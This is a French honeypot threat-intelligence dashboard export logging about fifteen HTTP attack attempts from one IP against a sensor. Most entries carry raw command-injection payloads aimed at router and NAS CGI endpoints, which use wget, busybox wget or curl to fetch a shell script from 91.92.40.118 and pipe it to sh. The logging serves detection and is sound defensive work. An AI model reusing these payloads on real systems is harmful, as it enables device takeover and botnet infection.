Profil de menace
Activité suspecte — risque 64/100 (Moyen) — MITRE T1083 — confiance 100 % — via HTTP
Activité suspecte — risque 64/100 (Moyen) — MITRE T1083 — confiance 100 % — via HTTP
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « lfi-12 » · Sonde fichier sensible / config · confiance 100%
Confiance 100 % — Score WAF 100 · 9 tag(s) WAF
ASN 197170 · 45.153.34.0/24 · RIPENCC — 8 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 47 événements sur la période pour cette IP.
Même FAI TechTies Inc. — corrélation indicative.
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
47 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
47 événement(s) — page 1/1
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 82 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:82 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wg… | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20g…
Émulateur
HTTP
WAF
58
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20genie%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20genie%…
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 9 tag(s) WAF
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
k8s-api
Payload (extrait)
GET /api/ping?host=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http://91.92.40.
Requête brute (extrait)
GET /api/ping?host=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20genie%60 HTTP/1.1 Host: 62.3.50.33:82 Con |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /cgi-bin/remote_link3.cgi | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /cgi-bin/remote_link3.cgi
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/cgi-bin/remote_link3.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/cgi-bin/remote_link3.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /cgi-bin/remote_link3.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 1
Requête brute (extrait)
POST /cgi-bin/remote_link3.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 167 Connection: close cmd=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s iodata;busybox wget http://91.92.40.118/wget.sh |
|||||||
| TCP | 82 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:82 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wg… | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20m…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20mitsu%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20mitsu%…
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 7 tag(s) WAF
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /action.php?host=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http://91.92.4
Requête brute (extrait)
GET /action.php?host=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20mitsu%60 HTTP/1.1 Host: 62.3.50.33:82 C |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /cgi-bin/export-cgi | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /cgi-bin/export-cgi
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/cgi-bin/export-cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/cgi-bin/export-cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /cgi-bin/export-cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 170 Co
Requête brute (extrait)
POST /cgi-bin/export-cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 170 Connection: close setCookie=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s zyxsc;busybox wget http://91.92.40.118/wget.sh |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /cgi-bin/remote_help-cgi | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /cgi-bin/remote_help-cgi
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/cgi-bin/remote_help-cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/cgi-bin/remote_help-cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /cgi-bin/remote_help-cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 16
Requête brute (extrait)
POST /cgi-bin/remote_help-cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 164 Connection: close cmd=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s zyxrh;busybox wget http://91.92.40.118/wget.sh - |
|||||||
| TCP | 82 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:82 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wg… | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20d…
Émulateur
HTTP
WAF
60
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dlnas%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dlnas%…
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « lfi-12 » · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 9 tag(s) WAF
Signaux
Http Sensitive
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
webshell-param-cmd
Payload (extrait)
GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb
Requête brute (extrait)
GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dlnas%60 HT |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /cgi-bin/wireless.cgi | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /cgi-bin/wireless.cgi
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/cgi-bin/wireless.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/cgi-bin/wireless.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /cgi-bin/wireless.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 171
Requête brute (extrait)
POST /cgi-bin/wireless.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 171 Connection: close sz11gChannel=1`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s wdr1;busybox wget http://91.92.40.118/wge |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /cgi-bin/internet.cgi | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /cgi-bin/internet.cgi
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/cgi-bin/internet.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/cgi-bin/internet.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /cgi-bin/internet.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 176
Requête brute (extrait)
POST /cgi-bin/internet.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 176 Connection: close gateway=192.168.1.1`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s wdr2;busybox wget http://91.92.40.11 |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /cgi-bin/adm.cgi | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /cgi-bin/adm.cgi
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
POST
/cgi-bin/adm.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/cgi-bin/adm.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /cgi-bin/adm.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 186 Conne
Requête brute (extrait)
POST /cgi-bin/adm.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 186 Connection: close reboot_enabled=1&reboot_time=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s wdr3;busybox wget http://91.92. |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /cgi-bin/makeRequest.cgi | Élevée | Moyen · 62 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /cgi-bin/makeRequest.cgi
Émulateur
HTTP
WAF
20
Recommandation
Investiguer
Tags
Cible HTTP
POST
/cgi-bin/makeRequest.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/cgi-bin/makeRequest.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 62
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
Http Cmdi
pat-0775
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932120 pipe chain
CRS 932205
Ligne de requête
User-Agent
—
Règles WAF
rce-0
rce-5
nosqli-3
Payload (extrait)
POST /cgi-bin/makeRequest.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 32
Requête brute (extrait)
POST /cgi-bin/makeRequest.cgi HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 32 Connection: close date=wget 91.92.40.118/r|sh -s w |
|||||||
| TCP | 82 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:82 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wg… | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20a…
Émulateur
HTTP
WAF
54
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20advan%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20advan%…
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 8 tag(s) WAF
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /edgserver/capture_packages?param=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget
Requête brute (extrait)
GET /edgserver/capture_packages?param=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20advan%60 HTTP/1.1 Host: |
|||||||
| TCP | 82 · HTTP | http | Injection de commande cmd injection · via HTTP:82 · (tentative d'exploit) · → /command.php | Élevée | Élevé · 81 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /command.php
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
POST
/command.php
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
82
Chemin / cible
/command.php
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 81
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Signaux
MITRE-T1059
Http Cmdi
pat-0773
pat-0775
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /command.php HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 164 Connectio
Requête brute (extrait)
POST /command.php HTTP/1.1 Host: 62.3.50.33:82 Content-Type: application/x-www-form-urlencoded Content-Length: 164 Connection: close cmd=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s dlcmd;busybox wget http://91.92.40.118/wget.sh -O-|sh -s dlc |
|||||||
| TCP | 82 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:82 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wg… | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20d…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dlcli%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dlcli%…
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « lfi-12 » · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 7 tag(s) WAF
Signaux
Http Sensitive
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /login.cgi?cli=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http://91.92.40.
Requête brute (extrait)
GET /login.cgi?cli=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dlcli%60 HTTP/1.1 Host: 62.3.50.33:82 Con |
|||||||
| TCP | 82 · HTTP | http | Énumération API REST rest api enum · via HTTP:82 · (sonde / probe) · → /wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20w… | Élevée | Moyen · 58 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0007
TA0007
TA0001
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20…
Émulateur
HTTP
WAF
66
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20xiaomi%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20xiao…
Service
HTTP
Pourquoi cette classification : Énumération API REST (tag lfi-12) · confiance 95%
Confiance classification
95%
Risque capteur
Moyen
· 58
Confiance : Confiance 95 % — 10 tag(s) WAF
Signaux
MITRE-T1190-api
Upstream
Api Probe Generic
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
LFI Double-dot bypass
Probe /api/v1/
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
lfi-14
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
redir-1
k8s-api
Payload (extrait)
GET /api/v1/status?command=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http://
Requête brute (extrait)
GET /api/v1/status?command=%60cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20xiaomi%60 HTTP/1.1 Host: 62.3.50 |
|||||||
| TCP | 82 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:82 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20… | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%2…
Émulateur
HTTP
WAF
48
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20billion%60
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
82
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20bi…
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 7 tag(s) WAF
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
